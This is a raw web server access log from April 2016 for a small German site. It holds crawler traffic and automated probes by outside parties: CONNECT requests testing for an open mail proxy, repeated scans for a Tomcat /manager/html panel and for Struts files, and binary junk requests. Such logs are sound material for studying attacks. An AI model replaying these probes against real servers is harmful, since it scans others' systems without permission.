54.152.40.11 - - [20/Apr/2016:16:48:01 +0200] "GET / HTTP/1.1" 400 6216 "-" "-"
40.77.167.44 - - [20/Apr/2016:16:59:57 +0200] "GET /robots.txt HTTP/1.1" 404 333 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
111.248.119.25 - - [20/Apr/2016:17:12:23 +0200] "CONNECT 126mx02.mxmail.netease.com:25 HTTP/1.0" 405 355 "-" "-"
54.152.25.27 - - [20/Apr/2016:17:12:52 +0200] "GET /impressum.html HTTP/1.1" 400 6192 "-" "-"
54.152.25.27 - - [20/Apr/2016:17:18:24 +0200] "GET /seiten/team.htm HTTP/1.1" 400 7640 "-" "-"
54.152.25.27 - - [20/Apr/2016:17:31:39 +0200] "GET /aktuelles.php HTTP/1.1" 400 7640 "-" "-"
54.152.25.27 - - [20/Apr/2016:17:38:38 +0200] "GET /location.html HTTP/1.1" 400 7640 "-" "-"
54.152.25.27 - - [20/Apr/2016:17:50:35 +0200] "GET /download/Geda-Zubehoer.pdf HTTP/1.1" 400 4744 "-" "-"
54.152.40.11 - - [20/Apr/2016:17:54:56 +0200] "GET /seiten/referenzen.htm HTTP/1.1" 400 6192 "-" "-"
52.201.239.26 - - [20/Apr/2016:17:57:23 +0200] "GET /seiten/produkte.htm HTTP/1.1" 400 6382 "-" "-"
115.231.222.14 - - [20/Apr/2016:18:26:35 +0200] "GET http://zc.qq.com/cgi-bin/common/attr?id=260714&r=0.9004892130073351 HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; 360SE)"
54.152.25.27 - - [20/Apr/2016:18:28:27 +0200] "GET /picture.html HTTP/1.1" 400 6196 "-" "-"
54.164.162.136 - - [20/Apr/2016:18:37:47 +0200] "GET /leistungen.php HTTP/1.1" 400 6212 "-" "-"
69.30.226.218 - - [20/Apr/2016:18:44:58 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
74.91.20.198 - - [20/Apr/2016:18:45:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
52.201.239.26 - - [20/Apr/2016:19:01:24 +0200] "GET /impressum.html HTTP/1.1" 400 7640 "-" "-"
54.152.40.11 - - [20/Apr/2016:19:03:07 +0200] "GET /referenzen.html HTTP/1.1" 400 7640 "-" "-"
52.201.239.26 - - [20/Apr/2016:19:05:38 +0200] "GET /leistungen.html HTTP/1.1" 400 7640 "-" "-"
74.91.23.110 - - [20/Apr/2016:19:10:10 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
52.90.126.130 - - [20/Apr/2016:19:15:17 +0200] "GET /seiten/impr.htm HTTP/1.1" 400 6202 "-" "-"
69.30.226.221 - - [20/Apr/2016:19:50:07 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
40.77.167.44 - - [20/Apr/2016:20:19:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
157.55.39.242 - - [20/Apr/2016:20:19:59 +0200] "GET /robots.txt HTTP/1.1" 404 333 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
54.152.25.27 - - [20/Apr/2016:20:31:06 +0200] "GET /impressum.html HTTP/1.1" 400 7640 "-" "-"
115.231.222.14 - - [20/Apr/2016:20:35:04 +0200] "GET http://zc.qq.com/cgi-bin/common/attr?id=260714&r=0.5101673556652083 HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; 360SE)"
204.12.196.235 - - [20/Apr/2016:20:48:27 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
107.150.32.61 - - [20/Apr/2016:20:51:58 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
54.152.25.27 - - [20/Apr/2016:20:56:56 +0200] "GET /leistungen.php HTTP/1.1" 400 7640 "-" "-"
74.91.17.182 - - [20/Apr/2016:21:08:38 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
54.164.162.136 - - [20/Apr/2016:21:08:59 +0200] "GET /praxis.php HTTP/1.1" 400 6266 "-" "-"
52.90.126.130 - - [20/Apr/2016:21:10:47 +0200] "GET /seiten/leistungen.htm HTTP/1.1" 400 7640 "-" "-"
61.228.92.175 - - [20/Apr/2016:21:11:44 +0200] "CONNECT 163mx02.mxmail.netease.com:25 HTTP/1.0" 405 355 "-" "-"
69.30.202.227 - - [20/Apr/2016:21:13:20 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
52.90.126.130 - - [20/Apr/2016:21:20:50 +0200] "GET /seiten/referenzen.htm HTTP/1.1" 400 7650 "-" "-"
74.91.18.46 - - [20/Apr/2016:21:27:35 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
54.152.25.27 - - [20/Apr/2016:21:31:14 +0200] "GET /seiten/kontakt.php HTTP/1.1" 400 7640 "-" "-"
54.152.40.11 - - [20/Apr/2016:21:36:37 +0200] "GET /kontakt.html HTTP/1.1" 400 7640 "-" "-"
204.12.196.237 - - [20/Apr/2016:21:39:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
74.91.17.182 - - [20/Apr/2016:21:44:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
107.150.32.60 - - [20/Apr/2016:22:02:16 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
54.164.162.136 - - [20/Apr/2016:22:05:30 +0200] "GET /seiten/leistungen.htm HTTP/1.1" 400 6192 "-" "-"
54.152.25.27 - - [20/Apr/2016:22:09:29 +0200] "GET /seiten/service.htm HTTP/1.1" 400 6192 "-" "-"
54.164.162.136 - - [20/Apr/2016:22:10:14 +0200] "GET /sonderthemen/archiv.html HTTP/1.1" 400 7640 "-" "-"
52.201.239.26 - - [20/Apr/2016:22:12:32 +0200] "GET /uns.html HTTP/1.1" 400 6192 "-" "-"
69.197.185.20 - - [20/Apr/2016:22:14:29 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
74.91.20.195 - - [20/Apr/2016:22:16:35 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
52.201.239.26 - - [20/Apr/2016:22:20:32 +0200] "GET /angebote.php HTTP/1.1" 400 7640 "-" "-"
69.30.226.221 - - [20/Apr/2016:22:23:40 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
54.152.25.27 - - [20/Apr/2016:22:32:35 +0200] "GET /seiten/ausbildung.htm HTTP/1.1" 400 7640 "-" "-"
52.201.239.26 - - [20/Apr/2016:22:34:58 +0200] "GET /seiten/praxis.htm HTTP/1.1" 400 7640 "-" "-"
54.164.162.136 - - [20/Apr/2016:22:37:00 +0200] "GET /unternehmen.php HTTP/1.1" 400 6192 "-" "-"
74.91.23.110 - - [20/Apr/2016:22:38:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
52.201.239.26 - - [20/Apr/2016:22:39:09 +0200] "GET /impressum.php HTTP/1.1" 400 7640 "-" "-"
115.231.222.14 - - [20/Apr/2016:22:44:11 +0200] "GET http://zc.qq.com/cgi-bin/common/attr?id=260714&r=0.0174070362327969 HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; 360SE)"
107.150.32.60 - - [20/Apr/2016:22:45:03 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
52.201.239.26 - - [20/Apr/2016:22:56:26 +0200] "GET / HTTP/1.1" 400 7640 "-" "-"
69.30.202.230 - - [20/Apr/2016:23:02:31 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
54.152.25.27 - - [20/Apr/2016:23:30:59 +0200] "GET / HTTP/1.1" 400 7640 "-" "-"
107.150.46.36 - - [20/Apr/2016:23:47:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
69.197.185.18 - - [20/Apr/2016:23:51:25 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
74.91.17.181 - - [20/Apr/2016:23:53:01 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
173.208.197.254 - - [20/Apr/2016:23:59:24 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
69.30.202.229 - - [21/Apr/2016:00:03:19 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
173.208.197.254 - - [21/Apr/2016:00:12:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
115.231.222.14 - - [21/Apr/2016:00:52:48 +0200] "GET http://zc.qq.com/cgi-bin/common/attr?id=260714&r=0.9448336821173399 HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; 360SE)"
115.231.222.14 - - [21/Apr/2016:00:52:48 +0200] "GET http://zc.qq.com/cgi-bin/common/attr?id=260714&r=0.8346779775100721 HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; 360SE)"
115.231.222.14 - - [21/Apr/2016:00:52:48 +0200] "GET http://zc.qq.com/cgi-bin/common/attr?id=260714&r=0.0187901097960578 HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; 360SE)"
69.30.226.219 - - [21/Apr/2016:01:14:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
61.228.89.95 - - [21/Apr/2016:01:18:02 +0200] "CONNECT 163mx01.mxmail.netease.com:25 HTTP/1.0" 405 355 "-" "-"
37.187.56.47 - - [21/Apr/2016:01:53:51 +0200] "GET /robots.txt HTTP/1.0" 404 328 "-" ""
37.187.56.47 - - [21/Apr/2016:01:53:51 +0200] "GET / HTTP/1.1" 206 1229 "-" "Mozilla/5.0 (X11; U; Linux amd64; rv:5.0) Gecko/20100101 Firefox/5.0 (Debian)"
115.231.222.14 - - [21/Apr/2016:03:01:17 +0200] "GET http://zc.qq.com/cgi-bin/common/attr?id=260714&r=0.9425468307959495 HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; 360SE)"
144.76.172.177 - - [21/Apr/2016:03:16:39 +0200] "GET /robots.txt HTTP/1.1" 404 327 "http://www.sitedomain.de/" "Sitedomain-Bot(Sitedomain-Bot 1.0, http://www.sitedomain.de/sitedomain-bot/)"
144.76.172.177 - - [21/Apr/2016:04:49:44 +0200] "GET /robots.txt HTTP/1.1" 404 337 "http://www.sitedomain.de/" "Sitedomain-Bot(Sitedomain-Bot 1.0, http://www.sitedomain.de/sitedomain-bot/)"
136.243.5.215 - - [21/Apr/2016:04:55:19 +0200] "GET /robots.txt HTTP/1.0" 404 328 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)"
136.243.5.215 - - [21/Apr/2016:04:55:23 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)"
5.9.112.6 - - [21/Apr/2016:04:58:02 +0200] "GET /ansprechpartner.html HTTP/1.1" 404 333 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.166 Safari/535.19"
115.231.222.14 - - [21/Apr/2016:05:10:04 +0200] "GET http://zc.qq.com/cgi-bin/common/attr?id=260714&r=0.7479952653995013 HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; 360SE)"
115.231.222.14 - - [21/Apr/2016:05:10:04 +0200] "GET http://zc.qq.com/cgi-bin/common/attr?id=260714&r=0.3084982503876117 HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; 360SE)"
120.132.50.135 - - [21/Apr/2016:05:10:22 +0200] "GET http://www.ctrip.com/ HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0"
111.243.204.141 - - [21/Apr/2016:05:47:58 +0200] "CONNECT 163mx01.mxmail.netease.com:25 HTTP/1.0" 405 355 "-" "-"
111.243.204.141 - - [21/Apr/2016:05:48:00 +0200] "CONNECT 163mx01.mxmail.netease.com:25 HTTP/1.0" 405 355 "-" "-"
111.243.204.141 - - [21/Apr/2016:05:48:15 +0200] "CONNECT 163mx01.mxmail.netease.com:25 HTTP/1.0" 405 355 "-" "-"
115.231.222.14 - - [21/Apr/2016:07:18:05 +0200] "GET http://zc.qq.com/cgi-bin/common/attr?id=260714&r=0.6112801624444451 HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; 360SE)"
115.231.222.14 - - [21/Apr/2016:07:18:05 +0200] "GET http://zc.qq.com/cgi-bin/common/attr?id=260714&r=0.7844433175111638 HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; 360SE)"
115.231.222.14 - - [21/Apr/2016:07:18:05 +0200] "GET http://zc.qq.com/cgi-bin/common/attr?id=260714&r=0.4325479453312075 HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; 360SE)"
111.248.97.100 - - [21/Apr/2016:08:24:07 +0200] "CONNECT 163mx03.mxmail.netease.com:25 HTTP/1.0" 405 355 "-" "-"
115.231.222.14 - - [21/Apr/2016:09:27:17 +0200] "GET http://zc.qq.com/cgi-bin/common/attr?id=260714&r=0.9697462049782524 HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; 360SE)"
169.54.244.75 - - [21/Apr/2016:09:38:26 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; rv:31.0) Gecko/20100101 Firefox/31.0"
169.54.244.75 - - [21/Apr/2016:09:38:26 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; rv:31.0) Gecko/20100101 Firefox/31.0"
169.54.244.75 - - [21/Apr/2016:09:39:38 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; rv:31.0) Gecko/20100101 Firefox/31.0"
169.54.244.75 - - [21/Apr/2016:09:39:42 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; rv:31.0) Gecko/20100101 Firefox/31.0"
169.54.244.75 - - [21/Apr/2016:09:40:08 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; rv:31.0) Gecko/20100101 Firefox/31.0"
169.54.244.75 - - [21/Apr/2016:09:40:39 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; rv:31.0) Gecko/20100101 Firefox/31.0"
169.54.244.75 - - [21/Apr/2016:09:40:43 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; rv:31.0) Gecko/20100101 Firefox/31.0"
169.54.244.75 - - [21/Apr/2016:09:40:44 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; rv:31.0) Gecko/20100101 Firefox/31.0"
169.54.244.75 - - [21/Apr/2016:09:40:45 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; rv:31.0) Gecko/20100101 Firefox/31.0"
169.54.244.75 - - [21/Apr/2016:09:40:46 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; rv:31.0) Gecko/20100101 Firefox/31.0"
51.254.143.239 - - [21/Apr/2016:11:22:36 +0200] "GET /robots.txt HTTP/1.0" 404 328 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)"
51.254.143.239 - - [21/Apr/2016:11:22:38 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)"
115.231.222.14 - - [21/Apr/2016:11:34:49 +0200] "GET http://zc.qq.com/cgi-bin/common/attr?id=260714&r=0.0371004720402658 HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; 360SE)"
115.231.222.14 - - [21/Apr/2016:11:34:49 +0200] "GET http://zc.qq.com/cgi-bin/common/attr?id=260714&r=0.4203885821985929 HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; 360SE)"
115.231.222.14 - - [21/Apr/2016:11:34:52 +0200] "GET http://zc.qq.com/cgi-bin/common/attr?id=260714&r=0.4646202495912150 HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; 360SE)"
220.167.100.13 - - [21/Apr/2016:11:55:14 +0200] "GET /manager/html HTTP/1.1" 404 317 "-" "Mozilla/3.0 (compatible; Indy Library)"
220.167.100.13 - - [21/Apr/2016:11:55:14 +0200] "GET /manager/html HTTP/1.1" 404 317 "-" "Mozilla/3.0 (compatible; Indy Library)"
220.167.100.13 - - [21/Apr/2016:11:55:14 +0200] "GET /manager/html HTTP/1.1" 404 317 "-" "Mozilla/3.0 (compatible; Indy Library)"
220.167.100.13 - - [21/Apr/2016:11:55:14 +0200] "GET /manager/html HTTP/1.1" 404 317 "-" "Mozilla/3.0 (compatible; Indy Library)"
220.167.100.13 - - [21/Apr/2016:11:55:14 +0200] "GET /manager/html HTTP/1.1" 404 317 "-" "Mozilla/3.0 (compatible; Indy Library)"
220.167.100.13 - - [21/Apr/2016:11:55:14 +0200] "GET /manager/html HTTP/1.1" 404 317 "-" "Mozilla/3.0 (compatible; Indy Library)"
220.167.100.13 - - [21/Apr/2016:11:55:14 +0200] "GET /manager/html HTTP/1.1" 404 317 "-" "Mozilla/3.0 (compatible; Indy Library)"
220.167.100.13 - - [21/Apr/2016:11:55:14 +0200] "GET /manager/html HTTP/1.1" 404 317 "-" "Mozilla/3.0 (compatible; Indy Library)"
220.167.100.13 - - [21/Apr/2016:11:55:14 +0200] "GET /manager/html HTTP/1.1" 404 317 "-" "Mozilla/3.0 (compatible; Indy Library)"
220.167.100.13 - - [21/Apr/2016:11:55:14 +0200] "GET /manager/html HTTP/1.1" 404 317 "-" "Mozilla/3.0 (compatible; Indy Library)"
111.248.101.34 - - [21/Apr/2016:12:58:04 +0200] "CONNECT 163mx03.mxmail.netease.com:25 HTTP/1.0" 405 355 "-" "-"
169.229.3.91 - - [21/Apr/2016:13:25:42 +0200] "\xb0R\xcf\xb7\xf9p#\x04T+" 501 325 "-" "-"
115.231.222.14 - - [21/Apr/2016:13:44:02 +0200] "GET http://zc.qq.com/cgi-bin/common/attr?id=260714&r=0.5417135430467830 HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; 360SE)"
115.231.222.14 - - [21/Apr/2016:13:44:03 +0200] "GET http://zc.qq.com/cgi-bin/common/attr?id=260714&r=0.3959169163132086 HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; 360SE)"
180.97.106.37 - - [21/Apr/2016:14:48:03 +0200] "GET /struts/utils.js HTTP/1.1" 404 320 "-" "-"
180.97.106.161 - - [21/Apr/2016:14:52:29 +0200] "GET /struts/utils.js HTTP/1.1" 404 320 "-" "-"
180.97.106.36 - - [21/Apr/2016:14:59:27 +0200] "GET /struts/utils.js HTTP/1.1" 404 320 "-" "-"
115.231.222.14 - - [21/Apr/2016:15:00:14 +0200] "GET http://zc.qq.com/cgi-bin/common/attr?id=260714&r=0.6494403823526142 HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; 360SE)"
115.231.222.14 - - [21/Apr/2016:15:00:14 +0200] "GET http://zc.qq.com/cgi-bin/common/attr?id=260714&r=0.7858019931730120 HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; 360SE)"
180.97.106.36 - - [21/Apr/2016:15:03:49 +0200] "GET /struts/utils.js HTTP/1.1" 404 320 "-" "-"
180.97.106.162 - - [21/Apr/2016:15:14:01 +0200] "GET /struts/utils.js HTTP/1.1" 404 320 "-" "-"
169.229.3.91 - - [21/Apr/2016:15:29:55 +0200] "T\x8c{\x92\xa7E\x876\xcd3\xf6\xc7\xabs\x84m\x86\x04\xc6l\xee\x85E\x9c\x82\x1e\xaex\x99\xa1ii\x18\xf7$\xa9\xc7\xc8\x8f\xfd\xa6J0" 501 358 "-" "-"
180.97.106.37 - - [21/Apr/2016:15:38:32 +0200] "GET /struts/utils.js HTTP/1.1" 404 320 "-" "-"
180.97.106.37 - - [21/Apr/2016:15:47:22 +0200] "GET /struts/utils.js HTTP/1.1" 404 320 "-" "-"
180.97.106.162 - - [21/Apr/2016:15:48:23 +0200] "GET /struts/utils.js HTTP/1.1" 404 320 "-" "-"
222.198.128.207 - - [21/Apr/2016:15:59:13 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
180.97.106.161 - - [21/Apr/2016:16:01:31 +0200] "GET /struts/utils.js HTTP/1.1" 404 320 "-" "-"
180.97.106.162 - - [21/Apr/2016:16:09:00 +0200] "GET /struts/utils.js HTTP/1.1" 404 320 "-" "-"
115.231.222.14 - - [21/Apr/2016:17:10:00 +0200] "GET http://zc.qq.com/cgi-bin/common/attr?id=260714&r=0.9095586063155937 HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; 360SE)"
115.231.222.14 - - [21/Apr/2016:17:10:00 +0200] "GET http://zc.qq.com/cgi-bin/common/attr?id=260714&r=0.3217285004356360 HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; 360SE)"
64.246.165.200 - - [21/Apr/2016:17:54:22 +0200] "GET /leer.htm HTTP/1.1" 404 313 "http://whois.domaintools.com/dialyse-schoenebeck.de" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.0.13) Gecko/2009073022 Firefox/3.5.2 (.NET CLR 3.5.30729) SurveyBot/2.3 (DomainTools)"
64.246.165.200 - - [21/Apr/2016:17:54:22 +0200] "GET /leer.htm HTTP/1.1" 404 313 "http://whois.domaintools.com/dialyse-schoenebeck.de" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.0.13) Gecko/2009073022 Firefox/3.5.2 (.NET CLR 3.5.30729) SurveyBot/2.3 (DomainTools)"
64.246.165.200 - - [21/Apr/2016:17:54:22 +0200] "GET /leer.htm HTTP/1.1" 404 313 "http://whois.domaintools.com/dialyse-schoenebeck.de" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.0.13) Gecko/2009073022 Firefox/3.5.2 (.NET CLR 3.5.30729) SurveyBot/2.3 (DomainTools)"
111.248.100.160 - - [21/Apr/2016:17:59:27 +0200] "CONNECT vip163mx01.mxmail.netease.com:25 HTTP/1.0" 405 358 "-" "-"
216.145.11.94 - - [21/Apr/2016:18:29:41 +0200] "GET /frameset/left.htm HTTP/1.1" 404 322 "http://whois.domaintools.com/die-sehnsucht.com" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.0.13) Gecko/2009073022 Firefox/3.5.2 (.NET CLR 3.5.30729) SurveyBot/2.3 (DomainTools)"
216.145.11.94 - - [21/Apr/2016:18:29:41 +0200] "GET /frameset/top.htm HTTP/1.1" 404 321 "http://whois.domaintools.com/die-sehnsucht.com" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.0.13) Gecko/2009073022 Firefox/3.5.2 (.NET CLR 3.5.30729) SurveyBot/2.3 (DomainTools)"
216.145.11.94 - - [21/Apr/2016:18:29:42 +0200] "GET /neue_seite_1.htm HTTP/1.1" 404 321 "http://whois.domaintools.com/die-sehnsucht.com" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.0.13) Gecko/2009073022 Firefox/3.5.2 (.NET CLR 3.5.30729) SurveyBot/2.3 (DomainTools)"
84.201.153.7 - - [21/Apr/2016:18:39:36 +0200] "GET /robots.txt HTTP/1.1" 404 318 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
